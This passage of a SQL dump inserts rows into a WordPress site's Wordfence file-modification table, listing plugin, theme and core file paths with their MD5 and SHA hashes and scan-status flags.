(0xe78b5a6412132bc41f071edbfd6441fb, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_time_24px.svg', 0, 0x9c0abe38bf6c7dae2bfc514783d0ff20, 0x9c0abe38bf6c7dae2bfc514783d0ff20, 0xa37e3260f5c9015b940cc3a9c0f9590652cc3acbd997cead3000232473b3f428, '', 0, '?'),
(0xe7944afaa1d19165f70d586494d424dd, 'wp-includes/class-wp-customize-widgets.php', 1, 0x00000000000000000000000000000000, 0xffef81a9a16c4b64d6f5918dec5950ad, 0x8b7f6decf942ed55d66dbfd336577e0293c7db02568a8466c6d52da633803068, '', 0, '?'),
(0xe7a4be659ec8480b990fc5f270f7c6dc, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_3_26x24px.svg', 0, 0xdf8d8add5d2c832b897597d53890fc07, 0xdf8d8add5d2c832b897597d53890fc07, 0xaeb9201627df75187d9a2e0f30f58c281b81278bd18d5ed92e83b9abb767e345, '', 0, '?'),
(0xe7aecfbc51324c434b1af9d159bcea35, 'wp-content/plugins/us-header-builder/admin/js/header-builder.js', 0, 0x1f000a7fcac54e13c85a37f0839ad2ce, 0x1f000a7fcac54e13c85a37f0839ad2ce, 0x8963a8cc468e96fb161a69fc25b6f0121d8e99a0108b5929b540d4424344c89a, '', 0, '?'),
(0xe7be5772d8761c096a82958b0b26e37b, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_CN.mo', 1, 0x00000000000000000000000000000000, 0x632697ca9f343f06b265a5d22f8e7a67, 0x79d9a41d86ac14fdadac850e8496a38d9bfb8d5fd006d7d2081e34a8a6400bc3, '', 0, '?'),
(0xe7c0f7c393babf5dc99aca648251eb76, 'wp-content/plugins/revslider/public/assets/fonts/revicons/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xe7c270a0f8a88b00d2d1068979775559, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_comment_24px.svg', 0, 0x0b68c22fd933dde0322ffb10ca9dfd6d, 0x0b68c22fd933dde0322ffb10ca9dfd6d, 0xb74550972978694d5ac6a5fed5795e6020c97d8afda3f30223b99f5e8a31ddbd, '', 0, '?'),
(0xe7c3d54bff679bd0e5876f1b23e71330, 'wp-activate.php', 1, 0x00000000000000000000000000000000, 0x4d6026066ab2cbd07ff2db603fa30c85, 0xf4a1ce6142395677e36bc22d67b91e394ae5593984153144f756ebbf3be23675, '', 0, '?'),
(0xe7c589fb0969e0f690bf2f051517d0ad, 'wp-includes/formatting.php', 1, 0x00000000000000000000000000000000, 0x7c3deedc453ae62959dbf3bf97581ced, 0xa73f0c34cbe3123b439483ade7096a999ba6c9c0c192bb7a3f89b097b7ed7ed4, '', 0, '?'),
(0xe7cf48e2b6c7cd6cf6b17b214423af21, 'wp-admin/js/color-picker.min.js', 1, 0x00000000000000000000000000000000, 0xd8c89846a5bc52ad623c42aad0eede4c, 0xb3d2c67fadc5a40b3144b8a42ec296009820b93e4f866d493bb983b98ea40b2b, '', 0, '?'),
(0xe7d8ce59a77a0260334cd43aa8d66c15, 'wp-content/themes/Impreza/framework/templates/404.php', 0, 0xa8b9adcb0bb59d9f2de71783e0afd455, 0xa8b9adcb0bb59d9f2de71783e0afd455, 0xec1a875ebcadf63a5dd74d03cba0ce71563998ac297ff2862ba2b57fd86aa099, '', 0, '?'),
(0xe7dadd4cb32e641544041d76ec12f905, 'wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php', 1, 0x00000000000000000000000000000000, 0x8569c40530f4a66a3889320ada739e1d, 0x768a935c7159157b53ab9c3c7c2bdbcf7b8d286dd6e5fd3f29f2f444f3023de2, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0xe7df346b25bfc42c5800f9a2652c364b, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_media_24px.svg', 0, 0xae393b3fd62857c34f1290963160e910, 0xae393b3fd62857c34f1290963160e910, 0xeddee6bc6c0a2fc2d0d5c72b233fcf3cafb75e07b40b32b4f2ec9548cb4ebce6, '', 0, '?'),
(0xe7e046fc5a5916bfd14338c08f1c3345, 'wp-admin/css/colors/blue/colors.css', 1, 0x00000000000000000000000000000000, 0x84449df9bef860843f536972b82c8742, 0x4d277815193074a9d25ffc3a1ca2e5fa94b6fd9e84d709396f9e1766feb4182b, '', 0, '?'),
(0xe7e3a747a74595393df00d98fad946be, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-remove.svg', 0, 0x063a8daf15ed659cfbbeda94535e248e, 0x063a8daf15ed659cfbbeda94535e248e, 0xcd73cbfa0a0316e5a2a01ac670226e29644898122d352e951f1e9f6ac7ae5fac, '', 0, '?'),
(0xe7f19ceb72fe21eb0ac01308b4cf1ac7, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/css/demo-files/demo.js', 0, 0xbc4d61fdc189a4a87b6a56e545b06423, 0xbc4d61fdc189a4a87b6a56e545b06423, 0x9dc3de96b354ee613f67d22501a1d9e5217338276eb2cee91ffce6138ddac097, '', 0, '?'),
(0xe802a818c3b7916724eb94f54de273df, 'wp-content/plugins/wordfence/views/waf/option-rate-limit.php', 1, 0x00000000000000000000000000000000, 0xe322c483457a5a1b83c51f4753cb2030, 0xfe34257099e944fd1b0e12bcaca84d5f1c4d69d7bded98dd44add81c7b46e4cd, '', 0, '?'),
(0xe820e7554c74473845f7d68d4e368413, 'wp-content/plugins/revslider/admin/views/templates/edit-slider.php', 0, 0x601bd44464161207cddbd593dd1e2990, 0x601bd44464161207cddbd593dd1e2990, 0xe73b38f6f1b07f41b542bd1e9a3017bba248566a4a316486898fd5dd8df2e564, '', 0, '?'),
(0xe825799d3e7d48c3166f14dae6fa2836, 'wp-includes/js/jquery/ui/core.min.js', 1, 0x00000000000000000000000000000000, 0x96ff65c925bbaf3e4e7891a7ca1f2b1f, 0x3589a6af897be960c50839f6b5f3475215f50db269709459ee9c69774574851a, '', 0, '?'),
(0xe84bec312c88baa90fe51acf5d1b5ba7, 'wp-content/themes/Impreza/framework/admin/functions/addons.php', 0, 0xa7342bdb11c526e266e9577c65c6056b, 0xa7342bdb11c526e266e9577c65c6056b, 0x9670e867930039c46ed7a8db40edaefcaad85855b9d55b55afef0ddcd4e0fd7f, '', 0, '?'),
(0xe85307484c656e0f50ee7137bec48d89, 'wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php', 1, 0x00000000000000000000000000000000, 0x1d6e81a9ca5ad3044855e51dcf98bc8f, 0xdd93fa2119bd23686c74d273f629883a7d2a61d945e0eff2d267f107896c5444, '', 0, '?'),
(0xe866f569bf60b81d3d4054b5e76fd902, 'wp-admin/images/spinner.gif', 1, 0x00000000000000000000000000000000, 0xd54cf50a44bd0aca6fd98bd46acbb2ba, 0x7ac68411e01a22ffb26e1a73b228ce55b60e2f7ef71537ba8046abf85ec285e3, '', 0, '?'),
(0xe874131d230581dd9578d5674d24bf1f, 'wp-content/plugins/js_composer/assets/js/dist/settings.min.js', 0, 0x29160f9ba9ae185b519e420583f67599, 0x29160f9ba9ae185b519e420583f67599, 0x38f9ae403ba3c0d0409f5112f8ddd95770a6dbd2ef4d007bf9f2ff5130ad002e, '', 0, '?'),
(0xe8776a3082a2363798b315841f40f954, 'wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php', 1, 0x00000000000000000000000000000000, 0x22ea8c327337acf85cef690c2397cb45, 0x61c7dcd80184d3de74b9c057f18f03c209cc334e8a1ac6e36078866849dd60c0, '', 0, '?'),
(0xe87f4a89d9e579949e306dec60e4a82f, 'wp-includes/class-IXR.php', 1, 0x00000000000000000000000000000000, 0x32ac76bea2307022852b2f7a62c60c2b, 0x80014f3076d857b5e2572e4e25ea4cf8f0a3ae0360da14587030746a5c0dbbc6, '', 0, '?'),
(0xe88c00855da870ddd2de91ea96090d47, 'wp-admin/css/customize-nav-menus.min.css', 1, 0x00000000000000000000000000000000, 0xe7fb504704cbc728b307fcef68bc40e0, 0x6198606b740b256a2ba81b51846d899db5f9e00a8519fe6899c6aa5768bf7ea9, '', 0, '?'),
(0xe8afeacca38b4d3f7cdfd12563e5c421, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_exit_to_app_24px.svg', 0, 0xe352e4b7d34ba001715e9da28063472a, 0xe352e4b7d34ba001715e9da28063472a, 0xc78a410c7b4da716355f0c09e365d69bd447911af16d17939951289a610bdd60, '', 0, '?'),
(0xe8cfccaa2688782c6400b0bfbc6639b9, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_toggle.js', 0, 0x5e88e27aef82fe66a18e00966f386835, 0x5e88e27aef82fe66a18e00966f386835, 0x39787ba1d371df83c6effccf396d70134addf5cf6e5f533c9ce967aacd1cce2f, '', 0, '?'),
(0xe8d293384b629e87424247394b2371b9, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_forward_24px.svg', 0, 0xde68f09fbfeea09529e3959102de534b, 0xde68f09fbfeea09529e3959102de534b, 0xe4a7992a8c0127ed054233785a67dd168c42296377e109c43e46063979b716ad, '', 0, '?'),
(0xe8f287f251cb6fb5482a04b982c028ef, 'wp-content/plugins/wordfence/images/sort_asc.gif', 1, 0x00000000000000000000000000000000, 0x2cb8bb49a7c52bc6bea0eafa7f3d80fc, 0x64b943ec1b5402bee8b5da1d85ee65262c29d1b4fae04647ee1a64e39d4f4ec5, '', 0, '?'),
(0xe8f4dfc012f1f6a14d4e5b9867bd21f1, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/icon.php', 0, 0x570413c7ec20c67028ac0a3633de715a, 0x570413c7ec20c67028ac0a3633de715a, 0xaaaca0ea11f2f80ec0463d699efb8779fda9957f1913bee9fee99b342ce91b46, '', 0, '?'),
(0xe8f5b425cc2481673364ba4e33f4fbf6, 'wp-content/plugins/js_composer/include/autoload/ui-vc-pointers.php', 0, 0xa14edb7af7a4e82df4386e8e56f1767e, 0xa14edb7af7a4e82df4386e8e56f1767e, 0x83a55325e3a4ed1216d91f9dd85b6ed54c192156a40f9e6e07bd9dd054b15110, '', 0, '?'),
(0xe8f682c4b5b8a57d62ecb99625aab2d0, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_camera_24px.svg', 0, 0x4f91ded0df61369559a925f8b591cf43, 0x4f91ded0df61369559a925f8b591cf43, 0x6c0836e8ea8f80d95d2ee5728cdffb4393de178bb007b70db53b45a510c0851c, '', 0, '?'),
(0xe8facbfd76ba4216420d010680d35a24, 'wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-templates-panel-editor.php', 0, 0xed25d7af63cd92b4914b746f258ba3c9, 0xed25d7af63cd92b4914b746f258ba3c9, 0x9e4400f6bd5e0a6927f26c38f7cfbcd4a9fcbc027006c76e842348564382f845, '', 0, '?'),
(0xe9022f0b8bc4ea2de0d8320a62a7752f, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_linear_scale_24px.svg', 0, 0xbac592d058c0b721c850155c10ac3afd, 0xbac592d058c0b721c850155c10ac3afd, 0x12b3f1e0f707f4671d8d9034404d50636bc8649923882a9d47d06956ae166a7e, '', 0, '?'),
(0xe909f05fd964a4b741946e6b9089102e, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_3d_rotation_24px.svg', 0, 0xaaeed8ca563e169997120c1a438c8298, 0xaaeed8ca563e169997120c1a438c8298, 0x283420160e30022adb60b0e185e91411ef1531d88ef356293b531a4a5241e1e0, '', 0, '?'),
(0xe910e260aae714ba50fb18c747092b1e, 'wp-content/themes/Impreza/framework/templates/elements/product_field.php', 0, 0x42ea385b8a9fbedc9d91ad7e211b2859, 0x42ea385b8a9fbedc9d91ad7e211b2859, 0x3781454d1ce38f27c291c942bb72db4918d3dbecb2fc2ed39c885d79f6460621, '', 0, '?'),
(0xe9122b9007ea7f828d33f4bb7005551f, 'wp-content/plugins/wordfence/lib/wfOnboardingController.php', 1, 0x00000000000000000000000000000000, 0x0981a72cbbdd239d940d822b011fbff8, 0x9bf7a1e893e9e2681ed45d2af7b73f59e95c0c217266794578515baeb0bd713d, '', 0, '?'),
(0xe91cb1249943da715a59758bba8b104a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart19.svg', 0, 0xc190fc259ec7ff4e27f61ff8c4479648, 0xc190fc259ec7ff4e27f61ff8c4479648, 0x035ca372015b77f90f5b559b6bd1836866b61a7afe0e742569bc082d74ae2f0b, '', 0, '?'),
(0xe94403f2bb3f2604c86ebd040879c2bf, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-layer-slider.svg', 0, 0x3cacffe742b4a6a6c221da298d92d02d, 0x3cacffe742b4a6a6c221da298d92d02d, 0x3b79df5baaf3a17519240249f32f08ab0aa690a48adf1fb7795d1bda00c6f3b3, '', 0, '?'),
(0xe946ce6a2159e97b072e4a3d2cb5ae12, 'wp-admin/images/stars.png', 1, 0x00000000000000000000000000000000, 0x5bace01f99903e3cf56bb27bd2ec2891, 0x2f09deef2285dac088044661ecb1943c5359dac367dc0fac0bd0d889468cd740, '', 0, '?'),
(0xe95d1ff7572f3eef7d3c38e8205646e3, 'wp-admin/includes/theme.php', 1, 0x00000000000000000000000000000000, 0x754533634f4a3ecb9e5e406718a4599d, 0x8f6391310be8ff5ef00d736dfb2dff623e1652682076fd78681b0ba17786836c, '', 0, '?'),
(0xe95e2e976a547df93cde04048c49be99, 'wp-admin/js/accordion.min.js', 1, 0x00000000000000000000000000000000, 0x67459976d4b544d88025aacbcc5d922c, 0x42023e8d26969070184dbe710d83f8071d1b7017a0d73f02baab693e2c27913f, '', 0, '?'),
(0xe96705d1c1b614ff55290d165228e21f, 'wp-includes/js/dist/is-shallow-equal.js', 1, 0x00000000000000000000000000000000, 0x8a86cb6d7546fd3f89a1f5109c476a88, 0x075afa3c4728ede08156d8f9f63d73fcc5d386bab9dd88076f43493e3fc4d20b, '', 0, '?'),
(0xe96d5b732a57102c58d4eee0c390f63a, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_0_bar_24px.svg', 0, 0xa60a52f0cb05c8ae69a564e7b71a66f3, 0xa60a52f0cb05c8ae69a564e7b71a66f3, 0x666ebafd6a769ada6d7502e6cf9bb22242eb80c6d7a5e2968111398e877c37e7, '', 0, '?'),
(0xe97c3aabea781e905a7eb12ad7776cf8, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php', 1, 0x00000000000000000000000000000000, 0x361ebd107f4735da6e3b45f7f9f63edc, 0x5132c6bc9116059b777c216c9a3f73544d839b6daeef80752ad812bc28ee807b, '', 0, '?'),
(0xe98154151d7fe14233ba9b0b47f6de7b, 'wp-includes/Requests/IPv6.php', 1, 0x00000000000000000000000000000000, 0xa5df4b884e8a07e81703f1ac6b6e54b1, 0xfe3dd8ed6c6e26ced1f8be84e7c483e64ac7d397b5890ba37ec4c4def785e96c, '', 0, '?'),
(0xe983b8d04697e45039e622a1f7a1e256, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_invert_colors_24px.svg', 0, 0xa5984968f6689f5e5d7750d9b21a9dc5, 0xa5984968f6689f5e5d7750d9b21a9dc5, 0xda8c38f5d3c143cc50c11c6acd4fe5f77c489941842b5b7289a7014de7059436, '', 0, '?'),
(0xe9944a5ef01980010017d5a05c5bf3bf, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_dvr_24px.svg', 0, 0xf811e2478bc0e8d8ecedada1e0351c00, 0xf811e2478bc0e8d8ecedada1e0351c00, 0xc3925d6771112dfa1e8d61c8a0a72ed516e04bfc070ecad116bb7729d830d027, '', 0, '?'),
(0xe9a0bbc0794e3c8ea08039806f1a3c0c, 'wp-admin/js/xfn.min.js', 1, 0x00000000000000000000000000000000, 0xa8ec7c5389884c02249560b08ba149bb, 0xb941f8b1789d684b0c13778e69569c2c849da7bdd536367d939a3a30630e7330, '', 0, '?'),
(0xe9aaca6dac164d1e74a88604db57b342, 'wp-admin/images/align-left.png', 1, 0x00000000000000000000000000000000, 0x5cfd7930cffa6412f75af26f2e689ed4, 0xe95f5dea3c23b653ce22b4425e55345f02dd513c21409a01783f4a24aea34bcf, '', 0, '?'),
(0xe9b10a8ea0dddd921c417d6a6bab248b, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user09.svg', 0, 0x28046d5ff2be8d9d3902341dd61f3006, 0x28046d5ff2be8d9d3902341dd61f3006, 0xde5c5116e8562f4569a756b0687da9193fa0f658298378f0c7b946399188f669, '', 0, '?'),
(0xe9cdd1f2a94a801f6cda6922e62016f7, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Navigation.php', 0, 0x415628c04302ddc46d1568f70beebad5, 0x415628c04302ddc46d1568f70beebad5, 0x958ab48ac5f6a1b3e72dc1697a282539ec3c85591a456b07c59c46a0480a60de, '', 0, '?'),
(0xe9d4dee27493fe985a01d14f2783200a, 'wp-includes/js/thickbox/macFFBgHack.png', 1, 0x00000000000000000000000000000000, 0x189217c8b067ef86add757922c2f75b4, 0x5277cb2fe0bf68d7ed2671e8de5d5aa2bd5f8ff3c4d61f1d4e6779f49588b9db, '', 0, '?'),
(0xe9d6e7d9f6562c4540865806829a9079, 'wp-includes/SimplePie/Cache/File.php', 1, 0x00000000000000000000000000000000, 0xa33dbb0540ecc29cc6425b14100953d1, 0x913916da212b1c8659fcfb1bd1e68a364c242d840395667126b1e8b687876b68, '', 0, '?'),
(0xe9f22f64659be8167712aae397d7a4fe, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_dehaze_24px.svg', 0, 0xabbadcf4f1a2783e2e95ad2289629e4e, 0xabbadcf4f1a2783e2e95ad2289629e4e, 0x1948ecf947ffa3ce83f69fb361ea92742f32edd587ea033cc339845a64d51415, '', 0, '?'),
(0xea0c116b4c4e00f4e7bb781836400e07, 'wp-admin/css/list-tables.min.css', 1, 0x00000000000000000000000000000000, 0x34e87e0a7614057b453abd9373beeada, 0xbd1cd4a896b547b6126a361816d387ca8c44e79c6f53272972b92f7adae47743, '', 0, '?'),
(0xea18c82c9b790f73d1bce5c3871ceebd, 'wp-content/plugins/revslider/admin/views/system/dialog-video.php', 0, 0x2edad02b5639ed399290adadb5277592, 0x2edad02b5639ed399290adadb5277592, 0x43bafd985352db57bf7ac6ca5ddb1910656c1da7a2269ac9200bf0b98734479f, '', 0, '?'),
(0xea242e465edd5ccd43511a41a689ca46, 'wp-content/plugins/js_composer/include/autoload/vc-undoredo.php', 0, 0x872a9c7acd2da9bca6b461c11e707362, 0x872a9c7acd2da9bca6b461c11e707362, 0xe9fcab16c43b3074fc4ea9230929f4fa1befd94c9966a3153d39251d446f8fc5, '', 0, '?'),
(0xea2d2ea706b40578b6c9a4e052bbdb1f, 'wp-admin/includes/privacy-tools.php', 1, 0x00000000000000000000000000000000, 0xc5aebfa164a6c151aff21b6e7349cf73, 0xb34d028e188e905d4eab98cef185700a34cf3512403c7e207fb50d3a72f29fb6, '', 0, '?'),
(0xea304ae994c7c1e9cd6678b023587b97, 'wp-includes/sodium_compat/namespaced/File.php', 1, 0x00000000000000000000000000000000, 0x5dd66d03c777e82fe65cc6793511da0e, 0xbbc990748964379648f190867d3db7f91e2e7493e2437724966063bac01327fc, '', 0, '?'),
(0xea34cad7e7ba3291160629412e3b34d1, 'wp-includes/js/customize-preview.js', 1, 0x00000000000000000000000000000000, 0xed68f9b2b0bc3518687aeb93d4d53950, 0xcdd887bce4a7c2df4962f12e3047987be1132ca917f37259acf03fc10662636f, '', 0, '?'),
(0xea3eeb3b6b01f4db898ba738e33ff4dd, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-arrows.svg', 0, 0xcc409b296d7a5993e88690a85cd49b68, 0xcc409b296d7a5993e88690a85cd49b68, 0x2a2757515bee8b98816925814a7b748ae63d44b45067bce4a863cc253bca5d81, '', 0, '?'),
(0xea4835281449782679babdf5c096a41b, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.slideanims.min.js', 0, 0x3ecf64623a5fbe3a5e14a492eba63f3f, 0x3ecf64623a5fbe3a5e14a492eba63f3f, 0x58e48706c9e92120733d16f5397ac5205e14166f1dc3eceeacd4e93c9f0e8b92, '', 0, '?'),
(0xea640aba763be84f313a9daeae2c546e, 'wp-content/plugins/wordfence/views/options/option-toggled-multiple.php', 1, 0x00000000000000000000000000000000, 0x852130fe84e0c04bdc8335e27b504428, 0x7baa9960ceb1ce3013ac48be6fac4705f09fa8b6e5f7ab4d6f248db850cae2d0, '', 0, '?'),
(0xea6e7c323b0f251fe3e2df093dc567a0, 'wp-content/plugins/revslider/admin/views/templates/slide-stage.php', 0, 0x13cbe4e8d81751172fca5a804efaaa59, 0x13cbe4e8d81751172fca5a804efaaa59, 0x37277ffa1edb68c0cd4f0244710ed7d172164049c6ed29fb1fbf96379df9cf15, '', 0, '?'),
(0xea7240a411c84406be8b5ad00ce4afa9, 'wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php', 1, 0x00000000000000000000000000000000, 0x018a214be50e091e357910bca181532a, 0xcefdbf885479874fee2575173bc855ec937de367e6fc319fef29980c7fdd5ac3, '', 0, '?'),
(0xea8da5b2ab326a456267d88857b278db, 'wp-includes/css/editor-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x340e21ee8bdc8d949bf8f3e619261f3d, 0x09c50f930866900315c69850bbddd492c4b1b15442bdd7df00beeb3738a74a31, '', 0, '?'),
(0xeaa81aaabb5469f9537887ddc62d667f, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/class-vc-gitem-acf-shortcode.php', 0, 0x7b1da437b9ff6f73151d08fc67380f8c, 0x7b1da437b9ff6f73151d08fc67380f8c, 0xec4afd0b74cfb1751bcc91cd7fb62006500903739045e7654d13b87c3da5296e, '', 0, '?'),
(0xeaafc787be1dc6db34cb93541f60a16b, 'wp-includes/js/wp-pointer.min.js', 1, 0x00000000000000000000000000000000, 0xa6b1f0f1180e40f7847a2a6d660da570, 0x323ba53d714a1935e6d51ac0cd36e6e49dabbf7eccff9cbea349d864a7bfc28e, '', 0, '?'),
(0xeab5672a65335462a1001be847881b5a, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-wpml.php', 0, 0x0c4c35d8368ada69433897d5a3339fd3, 0x0c4c35d8368ada69433897d5a3339fd3, 0x1fdd3a4381c7b78053722d56d23b74ed86318d20e03c0390eb4f811a17a1cbd2, '', 0, '?'),
(0xead10763fc873f606411a1b6516c15f0, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/quill.svg', 0, 0x1535ecc587bdfeb5263e2592694c1997, 0x1535ecc587bdfeb5263e2592694c1997, 0x8478323ce3c2611f671cc987000b86683d4a43996e0505a4aa2f3936c04f8669, '', 0, '?'),
(0xead5d628392b867f12049b8e293e2f38, 'wp-content/themes/Impreza/functions/migrations/us_migration_5_0.php', 0, 0x96aa4834eb0b6720ef96a3e34a471074, 0x96aa4834eb0b6720ef96a3e34a471074, 0xb0ab1005ab0160e85e3499c048db958bbf6e0558a9cb206f57f82a1afa591dab, '', 0, '?'),
(0xead7d06049cbedb37f2cf379206f9f59, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE', 1, 0x00000000000000000000000000000000, 0x3b83ef96387f14655fc854ddc3c6bd57, 0xddacef491153f45022f5619519bb2016374a8c36e75153768493f45fb38d7992, '', 0, '?'),
(0xeaf036ce5a97664defa31df30c943b84, 'wp-admin/css/site-health-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xc61f97d295efa7b259a1c31ed539a06c, 0x521dac38dbad577827b238822895becadde391578f6b5b815cf4b5a6f256eb3c, '', 0, '?'),
(0xeb0a6add8d656121e81a075764907110, 'wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php', 1, 0x00000000000000000000000000000000, 0x223c389f1da60bde032ef99fa14ba727, 0x201a59d3b51e80cbbc2a8a2c51864ceb597b16b4e3aca370c10d15bd6884b6c8, '', 0, '?'),
(0xeb207de6b61a2b88c50f2b7bde31255c, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_wide_angle_24px.svg', 0, 0xa8641aeba2a57aceebba22f3bbe3e344, 0xa8641aeba2a57aceebba22f3bbe3e344, 0x3c7e15863802e7de6e20dc80f9f1a09adcf9aede0095d13e81cba46f81ea5b73, '', 0, '?'),
(0xeb2a89958949526427e10d898f2027b4, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_image_separator.php', 0, 0xe40b89c35d85b22f1fb3dd87dd750b9e, 0xe40b89c35d85b22f1fb3dd87dd750b9e, 0x05a61dc7d46499684a9b4d50491f5d2bfbbf6fea07bed8cea2c96a98ae2bd549, '', 0, '?'),
(0xeb2d6eea242eff230b0b6725c47dddf7, 'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php', 1, 0x00000000000000000000000000000000, 0xe52014c24f0bd99143488cd89673ba20, 0x705898dc07e975637bf02d08e34bd78fda98a02f4f6e0f45309c9a8407294a42, '', 0, '?'),
(0xeb309e818a52f04ab37b79edcba3f7ef, 'wp-includes/general-template.php', 1, 0x00000000000000000000000000000000, 0x14d8211afcae22aea33c452e16de8773, 0x6b6a971ec1c686c521b048c146b3feedd09ef89d9652d08a5bb73924d6153cb9, '', 0, '?'),
(0xeb462019f338c72bb229d0d872dd50e8, 'wp-admin/images/no.png', 1, 0x00000000000000000000000000000000, 0xc86bbf1c64c924f99fdc9f5637f0c08b, 0x0ae03ec8d214a27e68c45af5a4d35000fd551030ca3b2720107bf5291209ac3e, '', 0, '?'),
(0xeb4d1aa5d5fc97481415b33fcdb21f5a, 'wp-includes/class-wp-rewrite.php', 1, 0x00000000000000000000000000000000, 0xb725a32dfda67c3b8ce5cfb3b739e3d1, 0x4cae112cf5b1f80be652fd2af731029f804ce467cfa2f0df5c5bf29b84f5ed83, '', 0, '?'),
(0xeb4fd3bf10fa3b0ea43d5c144abc7a79, 'wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js', 1, 0x00000000000000000000000000000000, 0xe692a8504899e953b1e96c8daaecb310, 0xadbba3799e0a99edb6f7902287fd6d63401c599b298dc70af08cde314669be96, '', 0, '?'),
(0xeb5146d43074e82bbcf6d8e199f0aa97, 'wp-includes/css/dist/block-library/style.min.css', 1, 0x00000000000000000000000000000000, 0x612b7ab9f699e968f5b3206ca16ee834, 0x4d85e66d07ef8c59e1525b7f27cc9f4d02297d148cb40628a3aa96c86f3e42da, '', 0, '?'),
(0xeb5487ebb5033108de28a915225f9912, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-user.svg', 0, 0xe9a11999dfbb690385d2a9b8eb12921a, 0xe9a11999dfbb690385d2a9b8eb12921a, 0x5bc012e46be2641d62091d53e646c7623b0f0c092239ce9e53792686512c8e81, '', 0, '?'),
(0xeb61b68e02752239733f824880f8c6e5, 'wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php', 1, 0x00000000000000000000000000000000, 0x83fc2531f914730fac987f15a5c38b47, 0x45948457d9b3a63fcc34e8e88540553fac1c3089018005eb62500b1dba2be668, '', 0, '?'),
(0xeb62ca41e09fdc59752db2e2a9fe287e, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/info-banner.js', 0, 0xa92a3f350f155037bb82c3bac4214f2c, 0xa92a3f350f155037bb82c3bac4214f2c, 0xbfe8e098c888f17eed075b1f936ee6ef684f8369c252738f6d4d73ddb3228de9, '', 0, '?'),
(0xeb695b5e73543cc5bac47b81d5370390, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_portrait_24px.svg', 0, 0xcc2c10c316a92471654fee602e4450d4, 0xcc2c10c316a92471654fee602e4450d4, 0x9b66d99f4debd2962ada4d1f1a21922c819362710eeb336bd7dc0a4e0c19e0cc, '', 0, '?'),
(0xeb8178b044aa2eb6e1da6d7e3c19d732, 'wp-content/plugins/wordfence/images/ratelimiting.svg', 1, 0x00000000000000000000000000000000, 0x005b7f9bec4db1c99e1ea579500fb0e9, 0xf44083ea0cad0cf453c4e77927e84e2b996be942c0bf33864a21501b62c69695, '', 0, '?'),
(0xeb82598e30aec9c0f8573bafa666213f, 'wp-content/plugins/Ultimate_VC_Addons/admin/js/dualbtnfront.js', 0, 0xa5d1174c2c174966f40ede7db3751ec4, 0xa5d1174c2c174966f40ede7db3751ec4, 0x5fd73129411247fc8ffe271ef348770973bbfee1af9ab48a317b7c493774c10d, '', 0, '?'),
(0xeb99eb28084b7e3a2c3c550800fa5db4, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_upload_24px.svg', 0, 0xc266232ff7261b4d34adf8b9a199d596, 0xc266232ff7261b4d34adf8b9a199d596, 0x8fcdb39a4ac5b9f7326aecead0cc74f8b711ecf39836067d6157f3542553e14f, '', 0, '?'),
(0xeb9a547b8962c7b81b502d5ad67299bd, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows012.svg', 0, 0xe7d8b4ac3a0a22ec087a4a1dafb6b6ad, 0xe7d8b4ac3a0a22ec087a4a1dafb6b6ad, 0xda0a2c331d84c444ec4dec2e9b6aa09bdaf9cbf86b0730e7bb3ed637aef603bc, '', 0, '?'),
